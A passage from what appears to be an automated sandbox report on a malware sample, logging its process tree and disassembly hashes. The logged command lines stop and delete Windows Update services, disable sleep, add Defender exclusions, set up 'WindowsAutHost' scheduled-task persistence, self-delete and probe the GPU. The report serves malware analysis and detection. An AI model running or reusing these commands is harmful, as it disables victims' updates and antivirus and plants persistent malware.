                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7c72c0000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:9
                      Start time:12:56:49
                      Start date:02/11/2022
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc stop UsoSvc
                      Imagebase:0x7ff61e220000
                      File size:69120 bytes
                      MD5 hash:D79784553A9410D15E04766AAAB77CD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:10
                      Start time:12:56:49
                      Start date:02/11/2022
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7c72c0000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:11
                      Start time:12:56:49
                      Start date:02/11/2022
                      Path:C:\Windows\System32\powercfg.exe
                      Wow64 process (32bit):false
                      Commandline:powercfg /x -hibernate-timeout-ac 0
                      Imagebase:0x7ff7c72c0000
                      File size:94720 bytes
                      MD5 hash:7C749DC22FCB1ED42A87AFA986B720F5
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:12
                      Start time:12:56:49
                      Start date:02/11/2022
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc stop WaaSMedicSvc
                      Imagebase:0x7ff705650000
                      File size:69120 bytes
                      MD5 hash:D79784553A9410D15E04766AAAB77CD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:13
                      Start time:12:56:50
                      Start date:02/11/2022
                      Path:C:\Windows\System32\powercfg.exe
                      Wow64 process (32bit):false
                      Commandline:powercfg /x -hibernate-timeout-dc 0
                      Imagebase:0x7ff7d0850000
                      File size:94720 bytes
                      MD5 hash:7C749DC22FCB1ED42A87AFA986B720F5
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:14
                      Start time:12:56:50
                      Start date:02/11/2022
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc stop wuauserv
                      Imagebase:0x7ff705650000
                      File size:69120 bytes
                      MD5 hash:D79784553A9410D15E04766AAAB77CD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:15
                      Start time:12:56:50
                      Start date:02/11/2022
                      Path:C:\Windows\System32\powercfg.exe
                      Wow64 process (32bit):false
                      Commandline:powercfg /x -standby-timeout-ac 0
                      Imagebase:0x7ff7d0850000
                      File size:94720 bytes
                      MD5 hash:7C749DC22FCB1ED42A87AFA986B720F5
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:16
                      Start time:12:56:50
                      Start date:02/11/2022
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc stop bits
                      Imagebase:0x7ff705650000
                      File size:69120 bytes
                      MD5 hash:D79784553A9410D15E04766AAAB77CD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:17
                      Start time:12:56:51
                      Start date:02/11/2022
                      Path:C:\Windows\System32\powercfg.exe
                      Wow64 process (32bit):false
                      Commandline:powercfg /x -standby-timeout-dc 0
                      Imagebase:0x7ff7d0850000
                      File size:94720 bytes
                      MD5 hash:7C749DC22FCB1ED42A87AFA986B720F5
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:18
                      Start time:12:56:51
                      Start date:02/11/2022
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc stop dosvc
                      Imagebase:0x7ff705650000
                      File size:69120 bytes
                      MD5 hash:D79784553A9410D15E04766AAAB77CD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:19
                      Start time:12:56:51
                      Start date:02/11/2022
                      Path:C:\Windows\System32\reg.exe
                      Wow64 process (32bit):false
                      Commandline:reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                      Imagebase:0x7ff685e30000
                      File size:72704 bytes
                      MD5 hash:E3DACF0B31841FA02064B4457D44B357
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:20
                      Start time:12:56:52
                      Start date:02/11/2022
                      Path:C:\Windows\System32\reg.exe
                      Wow64 process (32bit):false
                      Commandline:reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                      Imagebase:0x7ff685e30000
                      File size:72704 bytes
                      MD5 hash:E3DACF0B31841FA02064B4457D44B357
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:21
                      Start time:12:56:52
                      Start date:02/11/2022
                      Path:C:\Windows\System32\reg.exe
                      Wow64 process (32bit):false
                      Commandline:reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                      Imagebase:0x7ff685e30000
                      File size:72704 bytes
                      MD5 hash:E3DACF0B31841FA02064B4457D44B357
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:22
                      Start time:12:56:53
                      Start date:02/11/2022
                      Path:C:\Windows\System32\reg.exe
                      Wow64 process (32bit):false
                      Commandline:reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                      Imagebase:0x7ff685e30000
                      File size:72704 bytes
                      MD5 hash:E3DACF0B31841FA02064B4457D44B357
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:23
                      Start time:12:56:53
                      Start date:02/11/2022
                      Path:C:\Windows\System32\reg.exe
                      Wow64 process (32bit):false
                      Commandline:reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                      Imagebase:0x7ff685e30000
                      File size:72704 bytes
                      MD5 hash:E3DACF0B31841FA02064B4457D44B357
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:26
                      Start time:12:57:20
                      Start date:02/11/2022
                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):false
                      Commandline:powershell <#agjywv#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "WindowsAutHost" } Else { "C:\Program Files\WindowsServices\WindowsAutHost" }
                      Imagebase:0x7ff71d940000
                      File size:447488 bytes
                      MD5 hash:95000560239032BC68B4C2FDFCDEF913
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET

                      General

                      Target ID:27
                      Start time:12:57:20
                      Start date:02/11/2022
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\8iTXwpHCHb.exe"
                      Imagebase:0x7ff632260000
                      File size:273920 bytes
                      MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:28
                      Start time:12:57:20
                      Start date:02/11/2022
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7c72c0000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:29
                      Start time:12:57:21
                      Start date:02/11/2022
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7c72c0000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:30
                      Start time:12:57:21
                      Start date:02/11/2022
                      Path:C:\Windows\System32\choice.exe
                      Wow64 process (32bit):false
                      Commandline:choice /C Y /N /D Y /T 3
                      Imagebase:0x7ff739310000
                      File size:33280 bytes
                      MD5 hash:EA29BC6BCB1EFCE9C9946C3602F3E754
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:31
                      Start time:12:57:30
                      Start date:02/11/2022
                      Path:C:\Windows\System32\schtasks.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Windows\system32\schtasks.exe" /run /tn WindowsAutHost
                      Imagebase:0x7ff607080000
                      File size:226816 bytes
                      MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:32
                      Start time:12:57:30
                      Start date:02/11/2022
                      Path:C:\Program Files\WindowsServices\WindowsAutHost
                      Wow64 process (32bit):false
                      Commandline:C:\Program Files\WindowsServices\WindowsAutHost
                      Imagebase:0x7ff6208f0000
                      File size:9861121 bytes
                      MD5 hash:5B8C8BDDB55534C3C0DDA7CB094EEC00
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Antivirus matches:
                      • Detection: 100%, Avira
                      • Detection: 100%, Joe Sandbox ML

                      General

                      Target ID:33
                      Start time:12:57:51
                      Start date:02/11/2022
                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):false
                      Commandline:powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                      Imagebase:0x7ff71d940000
                      File size:447488 bytes
                      MD5 hash:95000560239032BC68B4C2FDFCDEF913
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET

                      General

                      Target ID:34
                      Start time:12:57:51
                      Start date:02/11/2022
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7c72c0000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:35
                      Start time:12:57:55
                      Start date:02/11/2022
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                      Imagebase:0x7ff632260000
                      File size:273920 bytes
                      MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:36
                      Start time:12:57:55
                      Start date:02/11/2022
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                      Imagebase:0x7ff632260000
                      File size:273920 bytes
                      MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:37
                      Start time:12:57:55
                      Start date:02/11/2022
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7c72c0000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:38
                      Start time:12:57:55
                      Start date:02/11/2022
                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):false
                      Commandline:powershell <#ujtstfzc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsAutHost' /tr '''C:\Program Files\WindowsServices\WindowsAutHost'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsServices\WindowsAutHost') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsAutHost' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsAutHost" /t REG_SZ /f /d 'C:\Program Files\WindowsServices\WindowsAutHost' }
                      Imagebase:0x7ff71d940000
                      File size:447488 bytes
                      MD5 hash:95000560239032BC68B4C2FDFCDEF913
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET

                      General

                      Target ID:39
                      Start time:12:57:55
                      Start date:02/11/2022
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7c72c0000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:40
                      Start time:12:57:56
                      Start date:02/11/2022
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc stop UsoSvc
                      Imagebase:0x7ff705650000
                      File size:69120 bytes
                      MD5 hash:D79784553A9410D15E04766AAAB77CD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:41
                      Start time:12:57:56
                      Start date:02/11/2022
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7c72c0000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:42
                      Start time:12:57:56
                      Start date:02/11/2022
                      Path:C:\Windows\System32\powercfg.exe
                      Wow64 process (32bit):false
                      Commandline:powercfg /x -hibernate-timeout-ac 0
                      Imagebase:0x7ff7d0850000
                      File size:94720 bytes
                      MD5 hash:7C749DC22FCB1ED42A87AFA986B720F5
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:43
                      Start time:12:57:56
                      Start date:02/11/2022
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc stop WaaSMedicSvc
                      Imagebase:0x7ff705650000
                      File size:69120 bytes
                      MD5 hash:D79784553A9410D15E04766AAAB77CD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:44
                      Start time:12:57:58
                      Start date:02/11/2022
                      Path:C:\Windows\System32\powercfg.exe
                      Wow64 process (32bit):false
                      Commandline:powercfg /x -hibernate-timeout-dc 0
                      Imagebase:0x7ff7d0850000
                      File size:94720 bytes
                      MD5 hash:7C749DC22FCB1ED42A87AFA986B720F5
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:45
                      Start time:12:57:58
                      Start date:02/11/2022
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc stop wuauserv
                      Imagebase:0x7ff705650000
                      File size:69120 bytes
                      MD5 hash:D79784553A9410D15E04766AAAB77CD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:46
                      Start time:12:57:58
                      Start date:02/11/2022
                      Path:C:\Windows\System32\powercfg.exe
                      Wow64 process (32bit):false
                      Commandline:powercfg /x -standby-timeout-ac 0
                      Imagebase:0x7ff7d0850000
                      File size:94720 bytes
                      MD5 hash:7C749DC22FCB1ED42A87AFA986B720F5
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:47
                      Start time:12:57:58
                      Start date:02/11/2022
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc stop bits
                      Imagebase:0x7ff705650000
                      File size:69120 bytes
                      MD5 hash:D79784553A9410D15E04766AAAB77CD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:48
                      Start time:12:57:59
                      Start date:02/11/2022
                      Path:C:\Windows\System32\powercfg.exe
                      Wow64 process (32bit):false
                      Commandline:powercfg /x -standby-timeout-dc 0
                      Imagebase:0x7ff7d0850000
                      File size:94720 bytes
                      MD5 hash:7C749DC22FCB1ED42A87AFA986B720F5
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:49
                      Start time:12:57:59
                      Start date:02/11/2022
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc stop dosvc
                      Imagebase:0x7ff705650000
                      File size:69120 bytes
                      MD5 hash:D79784553A9410D15E04766AAAB77CD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:50
                      Start time:12:57:59
                      Start date:02/11/2022
                      Path:C:\Windows\System32\reg.exe
                      Wow64 process (32bit):false
                      Commandline:reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                      Imagebase:0x7ff685e30000
                      File size:72704 bytes
                      MD5 hash:E3DACF0B31841FA02064B4457D44B357
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:51
                      Start time:12:58:00
                      Start date:02/11/2022
                      Path:C:\Windows\System32\reg.exe
                      Wow64 process (32bit):false
                      Commandline:reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                      Imagebase:0x7ff685e30000
                      File size:72704 bytes
                      MD5 hash:E3DACF0B31841FA02064B4457D44B357
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:52
                      Start time:12:58:01
                      Start date:02/11/2022
                      Path:C:\Windows\System32\reg.exe
                      Wow64 process (32bit):false
                      Commandline:reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                      Imagebase:0x7ff685e30000
                      File size:72704 bytes
                      MD5 hash:E3DACF0B31841FA02064B4457D44B357
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:53
                      Start time:12:58:01
                      Start date:02/11/2022
                      Path:C:\Windows\System32\reg.exe
                      Wow64 process (32bit):false
                      Commandline:reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                      Imagebase:0x7ff685e30000
                      File size:72704 bytes
                      MD5 hash:E3DACF0B31841FA02064B4457D44B357
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:54
                      Start time:12:58:02
                      Start date:02/11/2022
                      Path:C:\Windows\System32\reg.exe
                      Wow64 process (32bit):false
                      Commandline:reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                      Imagebase:0x7ff685e30000
                      File size:72704 bytes
                      MD5 hash:E3DACF0B31841FA02064B4457D44B357
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:58
                      Start time:12:58:26
                      Start date:02/11/2022
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe qeiyvjdhkxdq
                      Imagebase:0x7ff7c72c0000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:59
                      Start time:12:58:29
                      Start date:02/11/2022
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
                      Imagebase:0x7ff632260000
                      File size:273920 bytes
                      MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:60
                      Start time:12:58:29
                      Start date:02/11/2022
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
                      Imagebase:0x7ff632260000
                      File size:273920 bytes
                      MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:61
                      Start time:12:58:29
                      Start date:02/11/2022
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7c72c0000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:62
                      Start time:12:58:29
                      Start date:02/11/2022
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7c72c0000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:63
                      Start time:12:58:30
                      Start date:02/11/2022
                      Path:C:\Windows\System32\wbem\WMIC.exe
                      Wow64 process (32bit):false
                      Commandline:wmic PATH Win32_VideoController GET Name, VideoProcessor
                      Imagebase:0x7ff7d5530000
                      File size:521728 bytes
                      MD5 hash:EC80E603E0090B3AC3C1234C2BA43A0F
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:64
                      Start time:12:58:30
                      Start date:02/11/2022
                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):false
                      Commandline:powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                      Imagebase:0x7ff71d940000
                      File size:447488 bytes
                      MD5 hash:95000560239032BC68B4C2FDFCDEF913
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET

                      General

                      Target ID:65
                      Start time:12:58:31
                      Start date:02/11/2022
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7c72c0000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Disassembly

                      Reset < >

                        Executed Functions

                        Function 00007FF8163F3C1D Relevance: 1.9, Strings: 1, Instructions: 637COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.430957349.00007FF8163F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8163F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ff8163f0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: @
                        • API String ID: 0-2766056989
                        • Opcode ID: bfa8a9ed668151fd2ac17dbdff765a646c917cc5dbd2537e2e223c5c486ac94d
                        • Instruction ID: 31b5074b707160cf6b8d24ff3c426e76431d7918c974644a79aaa7519c923e5a
                        • Opcode Fuzzy Hash: bfa8a9ed668151fd2ac17dbdff765a646c917cc5dbd2537e2e223c5c486ac94d
                        • Instruction Fuzzy Hash: 0A221732D0DD898FFB95DA2C94456BD7BE0FF55360F1406FAD088C718BDA25A84987C2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF8163F6065 Relevance: 1.9, Strings: 1, Instructions: 628COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.430957349.00007FF8163F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8163F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ff8163f0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: __^
                        • API String ID: 0-4249834899
                        • Opcode ID: b03f8d4e21a743e26574559345b66f17929f6689b3cb704846f21ca5fc2230a3
                        • Instruction ID: c6bfdc9ba7b1e9c9a54bc7bf96934cc6e565978bd6184a23baa750060f46f622
                        • Opcode Fuzzy Hash: b03f8d4e21a743e26574559345b66f17929f6689b3cb704846f21ca5fc2230a3
                        • Instruction Fuzzy Hash: 24122932E0CD5A8FEB55DF3CD855AE97BA0FF56760F0402F6C088C7193CA26A8469781
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF8163FC2D5 Relevance: 1.7, Strings: 1, Instructions: 489COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.430957349.00007FF8163F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8163F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ff8163f0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: a_H
                        • API String ID: 0-661530712
                        • Opcode ID: e248055ccfd44cbdc5e5530f85ce59b162cd47a888b1f2cad5d42876a369ba14
                        • Instruction ID: 0b7a59c15e30d4fea0eb30cb9f3dbc1491595ca32d3505f6bc04e5d24fa5cb70
                        • Opcode Fuzzy Hash: e248055ccfd44cbdc5e5530f85ce59b162cd47a888b1f2cad5d42876a369ba14
                        • Instruction Fuzzy Hash: 43E1C231A08A4D8FDF88DF58C445AF97BE1FF69350F1402AAD44DD7296CA25EC82CB81
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF8163FB205 Relevance: .7, Instructions: 723COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.430957349.00007FF8163F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8163F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ff8163f0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 90dd6d310aa0eba7a1ae99f8bd283c6cdc256523b59aeef03cd555fd7a66cfd3
                        • Instruction ID: 4e4f66f866b808e63caede216bc5e82db596db646bdbfdb86bccea07f7d0f3d5
                        • Opcode Fuzzy Hash: 90dd6d310aa0eba7a1ae99f8bd283c6cdc256523b59aeef03cd555fd7a66cfd3
                        • Instruction Fuzzy Hash: 3C32B571A18A498FDB88EF1CC495AB977E1FF58350F1402ADD44AD7296CB35EC81CB81
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF8164C52C4 Relevance: .5, Instructions: 531COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.431624938.00007FF8164C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8164C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ff8164c0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2dd4dc253549c12f1cd00d6d512054d9e56aa6e1b4680f1d1e8d0f2178cab680
                        • Instruction ID: 1a77b47bff332b119516c1f65b54290ebbd9fb14f4ba00572862885fad1a61fa
                        • Opcode Fuzzy Hash: 2dd4dc253549c12f1cd00d6d512054d9e56aa6e1b4680f1d1e8d0f2178cab680
                        • Instruction Fuzzy Hash: 23F1FA22D0DBC55FE35A8B3858656B87FA0EF57760B0902FBD0C9CB193D9185C6AC392
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF8164C0ACD Relevance: .4, Instructions: 353COMMON
                        Download Yara Rule
                        Memory Dump Source
